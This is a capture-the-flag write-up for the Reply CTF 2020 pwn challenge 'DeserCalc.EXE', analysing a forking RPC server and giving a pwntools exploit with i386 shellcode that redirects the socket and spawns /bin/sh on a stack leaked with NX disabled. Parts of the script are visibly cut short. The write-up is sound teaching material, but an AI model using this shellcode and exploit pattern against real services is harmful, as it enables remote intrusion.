10 Oct 2020

DeserCalc.EXE - reply ctf 2020 - pwn

by nick0ve

Program description

Two files are given, client and server , but only the server is worth analyzing.

It is a forking server, the function which handles the connection is located @ 0x08049882.

It exchanges messages with the client by using a struct like that

struct RPC {
    uint32 addr;
    char msg[100];

The handler function:

  • check if the first msg received is JustPwnThis!
  • reply with the string OK
  • send an RPC object containing the address of do_calculation
  • receive an RPC object and assert that received_RPC.addr == do_calculation
  • then send another RPC object where send_RPC.addr == do_calculation - stack_buffer
    • So it is easy to calculate stack_buffer = do_calculation - send_RPC.addr
  • receive 2 RPC ojects and execute the function @ RPC[1].addr

handler pseudocode:

int handler(int client_fd)

  char buf [100];
  char *local_18;
  RPC *rpc_obj;
  log('I',"PID %d: %s\n",_Var1,"Incoming connection...", getpid());
  if check_password(client_fd,"JustPwnThis!") == 0) {
    return -1;
  else {
    rpc_obj = alloc_RPC_structs(2);
    if (check_RPC_addr_and_leak_param3(client_fd,rpc_obj + 1,buf) == 0) {
      log('W',"PID %d: %s\n",_Var1,"exiting. reason: wrong RPC address...", getpid());
      return -1;
    else {
      local_18 = (char *)(*(code *)rpc_obj[1].RPC_addr)(buf);
      log('I',"PID %d: %s\n",_Var1,"exiting normally...", getpid());
      return 0;


checksec server output:

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)

NX is disabled so it is possible to just jump at the stack buffer leaked by the server

from pwn import *
from binascii import hexlify

# Set up pwntools for the correct architecture
exe = ELF('./server')

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.REMOTE:
        return remote('gamebox1.reply.it', 27364)
        return remote('', 8000)

def RPC(addr, msg):
    while len(msg) != 100:
        msg += b'\x41'
    return p32(addr) + msg

shellcode = '''
    mov ebx, 0x08049300 # close

# close(0)
    push 0
    call ebx

# close(1)
    push 1
    call ebx

    mov ebx, 0x08049050 # dup2

# dup2(4,0)
    push 0
    push 4 
    call ebx

# dup2(4,1)
    push 1
    push 4 
    call ebx

# execve binbash
    xor    eax, eax
    push   eax
    push   0x68732f2f
    push   0x6e69622f
    mov    ebx, esp
    mov    ecx, eax
    mov    edx, eax
    mov    al, 0xb
    int    0x80

io = start()

password = b'JustPwnThis!'


DO_CALCULATION = 0x0804a8c8

scode = asm(shellcode, arch = 'i386')

# this scode is gonna be stored in buf of handler function
payload = RPC(DO_CALCULATION, scode)
RPC1 = io.recv()
bufleak = (DO_CALCULATION - u32(RPC1[:4])) & 0xffffffff
print ("buf @ %08x" % (bufleak))

- garbage RPC
- RPC (function_to_execute=scode_location, garbage)

# get a shell

The shellcode closes stdin,stdout, redirect stdin and stdout to the client_fd with dup2(client_fd,1) dup2(client_fd,0), then it does the classic execve(binbash)